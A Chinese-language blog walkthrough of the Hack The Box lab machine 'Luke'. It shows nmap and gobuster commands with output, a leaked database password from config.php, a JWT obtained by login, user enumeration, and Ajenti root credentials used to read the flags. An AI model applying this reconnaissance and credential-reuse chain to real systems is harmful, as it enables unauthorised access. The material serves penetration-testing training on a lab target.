HTB linux LuKe

Posted on | In
Words count in article: 725 | Reading time ≈ 3

简介
靶机凭借信息收集就可以完成,唯一的一个点是node增加jwt token,通过google查到medium上一篇文章,根据上面介绍的方法成功获得靶机的flag。

靶机状态: rooted.

文章目录

  • nmap
  • gobuster
  • jwt

nmap

拿到ip之后,通过nmap扫描端口, 发现存在3个WEB端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$ nmap -sC -sV -oA Luke 10.10.10.137
# Nmap 7.70 scan initiated Sun Jun 23 17:36:14 2019 as: nmap -sC -sV -oA Luke 10.10.10.137
Nmap scan report for 10.10.10.137
Host is up (0.63s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.15.44
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http       Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http       Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 23 17:40:37 2019 -- 1 IP address (1 host up) scanned in 262.37 seconds

gobuster

拿到3个WEB服务后,开始枚举服务,浏览器访问之后,确认80端口为php WEB站点,3000端口为node js站点,8000端口为Ajenti站点;利用gobuster分别对3000端口和80端口进行uri爆破,同时在google上搜索公开的Ajenti漏洞

1
2
3
$ gobuster dir -u http://10.10.10.137:3000 -w wordlists/SecLists/Discovery/Web-Content/common.txt -t 1

$ gobuster dir -u http://10.10.10.137 -w wordlists/dirbuster/directory-list-2.3-medium.txt -t 1

然后在80端口找到config.php文件, 拿到数据库连接串

1
$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);

jwt

利用dbPassword登陆3000端口,获取jwt token

1
2
3
4
post 10.10.10.137:3000/login
{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}

{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY0NDEwMjA5LCJleHAiOjE1NjQ0OTY2MDl9.QvWg8Xa1QsNcUlv19G37JWCD7omdRmlSN8GnVj-YAHs"}

token为jwt token,因此查找如何在node中添加jwt token, 然后在add jwt to nodejs这篇文章中找到利用jwt token访问的方法。然后在3000端口的/users接口中找到如下用户:

1
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]

通过访问/users/可以查看到用户对应的密码,利用找到的密码登陆80端口的/management接口,找到config.json文件,从config.json文件中找到Ajenti服务的用户名”root”和密码”KpMasng6S5EtTy9Z”

登陆Ajenti之后,通过notepad工具读取user.txt和root.txt

owefsad wechat
进击的DevSecOps,持续分享SAST/IAST/RASP的技术原理及甲方落地实践。如果你对 SAST、IAST、RASP方向感兴趣,可以扫描下方二维码关注公众号,获得更及时的内容推送。
0%